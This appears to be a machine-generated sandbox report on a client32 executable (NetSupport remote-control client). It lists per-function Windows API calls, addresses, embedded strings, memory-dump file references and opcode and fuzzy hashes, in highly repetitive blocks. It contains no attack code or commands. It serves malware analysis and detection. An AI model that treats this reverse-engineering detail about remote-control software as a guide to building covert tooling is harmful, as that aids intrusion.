                                                                                                                                                                                                    • API String ID: 2050226656-800295887
                                                                                                                                                                                                    • Opcode ID: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction ID: f5da5898e03af7335dd3b432591c065ee650f23ce63a0b1c8c4037c06c323e7f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cc1fde5e20de1d22eceee8bdc9d3861e2b7a2064f589f295b2194325481a8e0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2B186B5A44329AFE720DF54CC85FDAF7B8EB48704F108199E619A72C0DB70AA44CF55
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CapiHangup.PCICAPI ref: 1106F48F
                                                                                                                                                                                                    • CapiClose.PCICAPI ref: 1106F494
                                                                                                                                                                                                    • CapiOpen.PCICAPI(00000000,00000000), ref: 1106F49D
                                                                                                                                                                                                    • CapiListen.PCICAPI(00000001,00000000,00000000,00000000), ref: 1106F4AB
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F53A
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F542
                                                                                                                                                                                                    • CapiHangup.PCICAPI ref: 1106F5CF
                                                                                                                                                                                                    • Sleep.KERNEL32(00000064,?,?,?,?,?,?,?,?,?,?,?,?,?,000018BF,10000000), ref: 1106F5F9
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 1106F5FF
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 1106F645
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Capi$CountTick$HangupSleep$CloseListenOpen
                                                                                                                                                                                                    • String ID: $DB$*MSN$..\ctl32\Connect.cpp$Dialup$tapi
                                                                                                                                                                                                    • API String ID: 1585182496-2734021829
                                                                                                                                                                                                    • Opcode ID: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
                                                                                                                                                                                                    • Instruction ID: 1aecc925b5fbc5169191dead02c85a6a785123c90751e1c82bbc8ebf3e53e7af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74ef3de325968d0df488956b07f6257953592f03bacc9e67c3f9bff9792d1deb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6C1F775F0022A8BE710DF64DC91B9DB7A8AF44318F5081B9E55D9B2C1DE71AE80CB92
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00000000,00000000,?), ref: 1112714B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ManagerOpen
                                                                                                                                                                                                    • String ID: EnumServices returned %d$QueryServiceConfig2W$advapi32.dll
                                                                                                                                                                                                    • API String ID: 1889721586-3267302290
                                                                                                                                                                                                    • Opcode ID: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
                                                                                                                                                                                                    • Instruction ID: 9fb7de677e030cfc0a01f6eedc798a2385bd80f55b8063cdc9a43f6634fa85b6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f71f311369f89944e2e6dd7273e3b0169b5e8875ec6bdfe2952af4a623be109
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39E17575A006599FEB24CF24CD94FABF7B9AF84304F208699E91997240DF30AE85CF50
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 11025347
                                                                                                                                                                                                    • DrawMenuBar.USER32(?), ref: 1102535E
                                                                                                                                                                                                    • GetMenu.USER32(?), ref: 110253B3
                                                                                                                                                                                                    • DeleteMenu.USER32(00000000,00000001,00000400), ref: 110253C1
                                                                                                                                                                                                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1102531E
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11025407
                                                                                                                                                                                                    • IsIconic.USER32(?), ref: 1102541A
                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,000003E8,00000000), ref: 1102543A
                                                                                                                                                                                                    • KillTimer.USER32(00000000,00000000,00000080,00000002), ref: 110254A0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Menu$TimerWindow$DeleteDrawErrorExitIconicKillLastMessageProcessUpdatewsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\chatw.cpp$Chat$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3085788722-363603473
                                                                                                                                                                                                    • Opcode ID: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
                                                                                                                                                                                                    • Instruction ID: b6232a099581f0ae497a3b344fdba13ecce31f738ecb0fc666d570829b7bf44f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e9949b81ec4ef44488bee38b5200722746b43fa6273fddd0f095c3bd1cd4de0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14D1AC74B40702ABEB14DB64CC85FAEB3A5BB88708F104558F6529F3C1DAB1F941CB95
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 1108B323
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 1108B32F
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B336
                                                                                                                                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 1108B34A
                                                                                                                                                                                                    • IsValidSid.ADVAPI32(?), ref: 1108B377
                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 1108B388
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 1108B393
                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 1108B39A
                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 1108B3B4
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1108B3CC
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B3D3
                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 1108B3E6
                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 1108B3ED
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Heap$Process$AllocFreeInformationToken$CopyLengthValid
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3743738291-0
                                                                                                                                                                                                    • Opcode ID: d3a2ad14d567a86b3a5c967b11ade788d4e6e56e00f91bcbf2a518966f882515
                                                                                                                                                                                                    • Instruction ID: 2cc4b386b60098d1c35d7a3f140f102fc95985083371501cdc94239c6e30dc2e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3a2ad14d567a86b3a5c967b11ade788d4e6e56e00f91bcbf2a518966f882515
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB3136B5A04616ABE711DFA9C8C8A6FBBACFF48755F008469FE15C7244DAB0D900CB61
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetWindowLongA.USER32(?,000000FC,?), ref: 1115B1C6
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1E5
                                                                                                                                                                                                    • RemovePropA.USER32(?), ref: 1115B1F4
                                                                                                                                                                                                    • RemovePropA.USER32(?,00000000), ref: 1115B203
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 1115B55A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: PropRemove$Window$CallErrorExitLastLongMessageProcProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\wndclass.cpp$old_wndproc
                                                                                                                                                                                                    • API String ID: 1777853711-3305400014
                                                                                                                                                                                                    • Opcode ID: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                                                                                    • Instruction ID: ee076e1b1c12c59e2fd2c34d2ca2faed304bf4b043a58102cf48aae30fabbc62
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c3063e6233cfac457fb0abdd6f1d250989d48feedc8840d264afa341f117270a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 43C17BB53041199FD748CE69E890E7FB3EAFBC8311B10466EF956C7781DA21AC118BB1
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetPropA.USER32(?,?,?), ref: 1105B43A
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    • GetPropA.USER32(?), ref: 1105B44F
                                                                                                                                                                                                    • wsprintfA.USER32 ref: 1105B481
                                                                                                                                                                                                    • RemovePropA.USER32(?,00000000), ref: 1105B4BF
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Prop$wsprintf$ErrorExitLastMessageProcessRemove
                                                                                                                                                                                                    • String ID: CltReplay.cpp$NSMClientReplayWin::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
                                                                                                                                                                                                    • API String ID: 3799649539-2799116179
                                                                                                                                                                                                    • Opcode ID: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
                                                                                                                                                                                                    • Instruction ID: 878e0ad0ae89c655833a3453bcd56fdaae4dff5bf5d24e0f2c31a814972bd83f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d9d2d8c3e550ff45466778c24b4e32c1839308e0ddd69f6746950b92e3fe446
                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFC19875F0152D9BDB94CAA5DC90F7FB7AAEB84314F0041DAE90A97280DA35AD41CF70
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$CreateDialogIndirectParam$ErrorFindLastLoadLockwsprintf
                                                                                                                                                                                                    • String ID: $CLTCONN.CPP$DoUserLogin$Get login name. Check if logged in$GetName$Login name %s$Not logged in!$u
                                                                                                                                                                                                    • API String ID: 819444633-1552251038
                                                                                                                                                                                                    • Opcode ID: a72b9a5f7e756432c0518510a409f76593e1c895621e800cc3909e4c9bf393a0
                                                                                                                                                                                                    • Instruction ID: 25b904e35b270628fa9a38861c68e686706e0c30f1396ea4e15f3982f5bea4d1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a72b9a5f7e756432c0518510a409f76593e1c895621e800cc3909e4c9bf393a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97612674E41A1AEFD710DFA4CCC1FADF3A5AB8470DF104269EA265B2C0EB716940C792
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • OpenClipboard.USER32(?), ref: 1101F387
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002002,00000002), ref: 1101F397
                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 1101F3A0
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 1101F3B2
                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 1101F3B8
                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 1101F3C1
                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 1101F3CC
                                                                                                                                                                                                    • MessageBeep.USER32(00000030), ref: 1101F3D4
                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 1101F3DA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
